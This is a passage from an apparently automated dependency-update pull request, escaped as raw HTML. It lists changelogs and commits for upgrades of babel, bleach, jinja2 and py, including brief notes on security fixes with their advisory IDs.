href=\u0026quot;https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5caf717\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Disallow special filenames on Windows\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\u0026quot;\u0026gt;\u0026lt;code\u0026gt;3a700b5\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Run locale identifiers through \u0026lt;code\u0026gt;os.path.basename()\u0026lt;/code\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\u0026quot;\u0026gt;\u0026lt;code\u0026gt;5afe2b2\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Merge pull request \u0026lt;a href=\u0026quot;https://redirect.github.com/python-babel/babel/issues/754\u0026quot;\u0026gt;#754\u0026lt;/a\u0026gt; from python-babel/github-ci\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\u0026quot;\u0026gt;\u0026lt;code\u0026gt;58de834\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Replace Travis + Appveyor with GitHub Actions (WIP)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\u0026quot;\u0026gt;\u0026lt;code\u0026gt;d1bbc08\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; import_cldr: use logging; add -q option\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\u0026quot;\u0026gt;\u0026lt;code\u0026gt;156b7fb\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Quiesce CLDR download progress bar if requested (or not a TTY)\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;\u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\u0026quot;\u0026gt;\u0026lt;code\u0026gt;613dc17\u0026lt;/code\u0026gt;\u0026lt;/a\u0026gt; Make the import warnings about unsupported number systems less verbose\u0026lt;/li\u0026gt;\n\u0026lt;li\u0026gt;Additional commits viewable in \u0026lt;a href=\u0026quot;https://github.com/python-babel/babel/compare/v2.8.0...v2.9.1\u0026quot;\u0026gt;compare view\u0026lt;/a\u0026gt;\u0026lt;/li\u0026gt;\n\u0026lt;/ul\u0026gt;\n\u0026lt;/details\u0026gt;\n\n\u0026lt;br /\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\n\nUpdates `bleach` from 3.1.5 to 3.3.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/mozilla/bleach/blob/main/CHANGES\"\u003ebleach's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.3.0 (February 1st, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBackwards incompatible changes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eclean escapes HTML comments even when strip_comments=False\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix bug 1621692 / GHSA-m6xf-fq7q-8743. See the advisory for details.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003ch2\u003eVersion 3.2.3 (January 26th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix clean and linkify raising ValueErrors for certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.2.2 (January 20th, 2021)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cp\u003eNone\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFeatures\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate CI to Github Actions. Thank you \u003ca href=\"https://github.com/hugovk\"\u003e\u003ccode\u003e@​hugovk\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eBug fixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003efix linkify raising an IndexError on certain inputs. Thank you \u003ca href=\"https://github.com/Google-Autofuzz\"\u003e\u003ccode\u003e@​Google-Autofuzz\u003c/code\u003e\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/79b7a3c5e56a09d1d323a5006afa59b56162eb13\"\u003e\u003ccode\u003e79b7a3c\u003c/code\u003e\u003c/a\u003e Merge pull request from GHSA-vv2x-vrpj-qqpq\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/842fcb4a05e59d9a22dafb8c51865ee79d753c03\"\u003e\u003ccode\u003e842fcb4\u003c/code\u003e\u003c/a\u003e Update for v3.3.0 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/1334134d34397966a7f7cfebd38639e9ba2c680e\"\u003e\u003ccode\u003e1334134\u003c/code\u003e\u003c/a\u003e sanitizer: escape HTML comments\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/c045a8b2a02bfb77bb9cacd5d3e5926c056074d2\"\u003e\u003ccode\u003ec045a8b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/581\"\u003e#581\u003c/a\u003e from mozilla/nit-fixes\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/491abb06ce89012d852f4c5ab3aff8f572532611\"\u003e\u003ccode\u003e491abb0\u003c/code\u003e\u003c/a\u003e fix typo s/vnedoring/vendoring/\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/10b1c5dda8ebceffce1d8f7d66d4b309b4f8c0cf\"\u003e\u003ccode\u003e10b1c5d\u003c/code\u003e\u003c/a\u003e vendor: add html5lib-1.1.dist-info/REQUESTED\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/cd838c3b527021f2780d77718488fa03d81f08e3\"\u003e\u003ccode\u003ecd838c3\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/mozilla/bleach/issues/579\"\u003e#579\u003c/a\u003e from mozilla/validate-convert-entity-code-points\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/612b8080ada0fba45f0575bfcd4f3a0bda7bfaca\"\u003e\u003ccode\u003e612b808\u003c/code\u003e\u003c/a\u003e Update for v3.2.3 release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/6879f6a67058c0d5977a8aa580b6338c9d34ff0e\"\u003e\u003ccode\u003e6879f6a\u003c/code\u003e\u003c/a\u003e html5lib_shim: validate unicode points for convert_entity\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mozilla/bleach/commit/90cb80be961aaf650ebc65b2ba2b789a2e9b129f\"\u003e\u003ccode\u003e90cb80b\u003c/code\u003e\u003c/a\u003e Update for v3.2.2 release\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/mozilla/bleach/compare/v3.1.5...v3.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.2 to 3.1.6\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/releases\"\u003ejinja2's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.1.6\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.6 security release, which fixes security issues but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.6/\"\u003ehttps://pypi.org/project/Jinja2/3.1.6/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\"\u003ehttps://jinja.palletsprojects.com/en/stable/changes/#version-3-1-6\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup, allowing the sandbox to apply its checks. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\"\u003ehttps://github.com/pallets/jinja/security/advisories/GHSA-cpwx-vrp4-4pq7\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.5\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.5 security fix release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes compared to the latest feature release.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.5/\"\u003ehttps://pypi.org/project/Jinja2/3.1.5/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/changes/#version-3-1-5\"\u003ehttps://jinja.palletsprojects.com/changes/#version-3-1-5\u003c/a\u003e\nMilestone: \u003ca href=\"https://github.com/pallets/jinja/milestone/16?closed=1\"\u003ehttps://github.com/pallets/jinja/milestone/16?closed=1\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as by passing a stored reference to a filter that calls its argument. \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-q2x7-8rv6-6q7h\"\u003eGHSA-q2x7-8rv6-6q7h\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid issues with names that contain f-string syntax. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1792\"\u003e#1792\u003c/a\u003e, \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-gmj6-6f8f-6699\"\u003eGHSA-gmj6-6f8f-6699\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence types. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2032\"\u003e#2032\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1952\"\u003e#1952\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in \u003ccode\u003eTemplate.generate_async\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1960\"\u003e#1960\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment when calling block references. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1701\"\u003e#1701\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another async-aware filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1781\"\u003e#1781\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1921\"\u003e#1921\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e call. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2021\"\u003e#2021\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e objects. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2025\"\u003e#2025\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2027\"\u003e#2027\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2061\"\u003e#2061\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were searched. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1661\"\u003e#1661\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not contain the templates directory. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1705\"\u003e#1705\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1880\"\u003e#1880\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1870\"\u003e#1870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eTests decorated with \u003ccode\u003e@pass_context\u003c/code\u003e can be used with the \u003ccode\u003e|select\u003c/code\u003e filter. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1624\"\u003e#1624\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e for multiple assignment (\u003ccode\u003ea, b = 1, 2\u003c/code\u003e) does not fail when the target is a namespace attribute. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1413\"\u003e#1413\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUsing \u003ccode\u003eset\u003c/code\u003e in all branches of \u003ccode\u003e{% if %}{% elif %}{% else %}\u003c/code\u003e blocks does not cause the variable to be considered initially undefined. \u003ca href=\"https://redirect.github.com/pallets/jinja/issues/1253\"\u003e#1253\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.4\u003c/h2\u003e\n\u003cp\u003eThis is the Jinja 3.1.4 security release, which fixes security issues and bugs but does not otherwise change behavior and should not result in breaking changes.\u003c/p\u003e\n\u003cp\u003ePyPI: \u003ca href=\"https://pypi.org/project/Jinja2/3.1.4/\"\u003ehttps://pypi.org/project/Jinja2/3.1.4/\u003c/a\u003e\nChanges: \u003ca href=\"https://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\"\u003ehttps://jinja.palletsprojects.com/en/3.1.x/changes/#version-3-1-4\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003exmlattr\u003c/code\u003e filter does not allow keys with \u003ccode\u003e/\u003c/code\u003e solidus, \u003ccode\u003e\u0026gt;\u003c/code\u003e greater-than sign, or \u003ccode\u003e=\u003c/code\u003e equals sign, in addition to disallowing spaces. Regardless of any validation done by Jinja, user input should never be used as keys to this filter, or must be separately validated first. GHSA-h75v-3vvj-5mfj\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e3.1.3\u003c/h2\u003e\n\u003cp\u003eThis is a fix release for the 3.1.x feature branch.\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix for \u003ca href=\"https://github.com/pallets/jinja/security/advisories/GHSA-h5c8-rqwp-cp95\"\u003eGHSA-h5c8-rqwp-cp95\u003c/a\u003e. You are affected if you are using \u003ccode\u003exmlattr\u003c/code\u003e and passing user input as attribute keys.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pallets/jinja/blob/main/CHANGES.rst\"\u003ejinja2's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 3.1.6\u003c/h2\u003e\n\u003cp\u003eReleased 2025-03-05\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe \u003ccode\u003e|attr\u003c/code\u003e filter does not bypass the environment's attribute lookup,\nallowing the sandbox to apply its checks. :ghsa:\u003ccode\u003ecpwx-vrp4-4pq7\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eVersion 3.1.5\u003c/h2\u003e\n\u003cp\u003eReleased 2024-12-21\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eThe sandboxed environment handles indirect calls to \u003ccode\u003estr.format\u003c/code\u003e, such as\nby passing a stored reference to a filter that calls its argument.\n:ghsa:\u003ccode\u003eq2x7-8rv6-6q7h\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eEscape template name before formatting it into error messages, to avoid\nissues with names that contain f-string syntax.\n:issue:\u003ccode\u003e1792\u003c/code\u003e, :ghsa:\u003ccode\u003egmj6-6f8f-6699\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eSandbox does not allow \u003ccode\u003eclear\u003c/code\u003e and \u003ccode\u003epop\u003c/code\u003e on known mutable sequence\ntypes. :issue:\u003ccode\u003e2032\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eCalling sync \u003ccode\u003erender\u003c/code\u003e for an async template uses \u003ccode\u003easyncio.run\u003c/code\u003e.\n:pr:\u003ccode\u003e1952\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid unclosed \u003ccode\u003eauto_aiter\u003c/code\u003e warnings. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eReturn an \u003ccode\u003eaclose\u003c/code\u003e-able \u003ccode\u003eAsyncGenerator\u003c/code\u003e from\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving \u003ccode\u003eroot_render_func()\u003c/code\u003e unclosed in\n\u003ccode\u003eTemplate.generate_async\u003c/code\u003e. :pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eAvoid leaving async generators unclosed in blocks, includes and extends.\n:pr:\u003ccode\u003e1960\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe runtime uses the correct \u003ccode\u003econcat\u003c/code\u003e function for the current environment\nwhen calling block references. :issue:\u003ccode\u003e1701\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake \u003ccode\u003e|unique\u003c/code\u003e async-aware, allowing it to be used after another\nasync-aware filter. :issue:\u003ccode\u003e1781\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e|int\u003c/code\u003e filter handles \u003ccode\u003eOverflowError\u003c/code\u003e from scientific notation.\n:issue:\u003ccode\u003e1921\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eMake compiling deterministic for tuple unpacking in a \u003ccode\u003e{% set ... %}\u003c/code\u003e\ncall. :issue:\u003ccode\u003e2021\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix dunder protocol (\u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e/etc) interaction with \u003ccode\u003eUndefined\u003c/code\u003e\nobjects. :issue:\u003ccode\u003e2025\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eFix \u003ccode\u003ecopy\u003c/code\u003e/\u003ccode\u003epickle\u003c/code\u003e support for the internal \u003ccode\u003emissing\u003c/code\u003e object.\n:issue:\u003ccode\u003e2027\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eEnvironment.overlay(enable_async)\u003c/code\u003e is applied correctly. :pr:\u003ccode\u003e2061\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eThe error message from \u003ccode\u003eFileSystemLoader\u003c/code\u003e includes the paths that were\nsearched. :issue:\u003ccode\u003e1661\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ePackageLoader\u003c/code\u003e shows a clearer error message when the package does not\ncontain the templates directory. :issue:\u003ccode\u003e1705\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eImprove annotations for methods returning copies. :pr:\u003ccode\u003e1880\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eurlize\u003c/code\u003e does not add \u003ccode\u003emailto:\u003c/code\u003e to values like \u003ccode\u003e@a@b\u003c/code\u003e. :pr:\u003ccode\u003e1870\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/15206881c006c79667fe5154fe80c01c65410679\"\u003e\u003ccode\u003e1520688\u003c/code\u003e\u003c/a\u003e release version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/90457bbf33b8662926ae65cdde4c4c32e756e403\"\u003e\u003ccode\u003e90457bb\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/065334d1ee5b7210e1a0a93c37238c86858f2af7\"\u003e\u003ccode\u003e065334d\u003c/code\u003e\u003c/a\u003e attr filter uses env.getattr\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/033c20015c7ca899ab52eb921bb0f08e6d3dd145\"\u003e\u003ccode\u003e033c200\u003c/code\u003e\u003c/a\u003e start version 3.1.6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/bc68d4efa99c5f77334f0e519628558059ae8c35\"\u003e\u003ccode\u003ebc68d4e\u003c/code\u003e\u003c/a\u003e use global contributing guide (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/247de5e0c5062a792eb378e50e13e692885ee486\"\u003e\u003ccode\u003e247de5e\u003c/code\u003e\u003c/a\u003e use global contributing guide\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/ab8218c7a1b66b62e0ad6b941bd514e3a64a358f\"\u003e\u003ccode\u003eab8218c\u003c/code\u003e\u003c/a\u003e use project advisory link instead of global\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/b4ffc8ff299dfd360064bea4cd2f862364601ad2\"\u003e\u003ccode\u003eb4ffc8f\u003c/code\u003e\u003c/a\u003e release version 3.1.5 (\u003ca href=\"https://redirect.github.com/pallets/jinja/issues/2066\"\u003e#2066\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/877f6e51be8e1765b06d911cfaa9033775f051d1\"\u003e\u003ccode\u003e877f6e5\u003c/code\u003e\u003c/a\u003e release version 3.1.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pallets/jinja/commit/8d588592653b052f957b720e1fc93196e06f207f\"\u003e\u003ccode\u003e8d58859\u003c/code\u003e\u003c/a\u003e remove test pypi\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pallets/jinja/compare/2.11.2...3.1.6\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `py` from 1.8.1 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.10.0 (2020-12-12)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eFix a regular expression DoS vulnerability in the py.path.svnwc SVN blame functionality (CVE-2020-29651)\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.4 =\u0026gt; 1.5\u003c/li\u003e\n\u003cli\u003eUpdate vendored iniconfig: 1.0.0 =\u0026gt; 1.1.1\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.9.0 (2020-06-24)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eAdd type annotation stubs for the following modules:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epy.error\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.iniconfig\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.path\u003c/code\u003e (not including SVN paths)\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.io\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003epy.xml\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eThere are no plans to type other modules at this time.\u003c/p\u003e\n\u003cp\u003eThe type annotations are provided in external .pyi files, not inline in the\ncode, and may therefore contain small errors or omissions. If you use \u003ccode\u003epy\u003c/code\u003e\nin conjunction with a type checker, and encounter any type errors you believe\nshould be accepted, please report it in an issue.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e1.8.2 (2020-06-15)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eOn Windows, \u003ccode\u003epy.path.local\u003c/code\u003es which differ only in case now have the same\nPython hash value. Previously, such paths were considered equal but had\ndifferent hashes, which is not allowed and breaks the assumptions made by\ndicts, sets and other users of 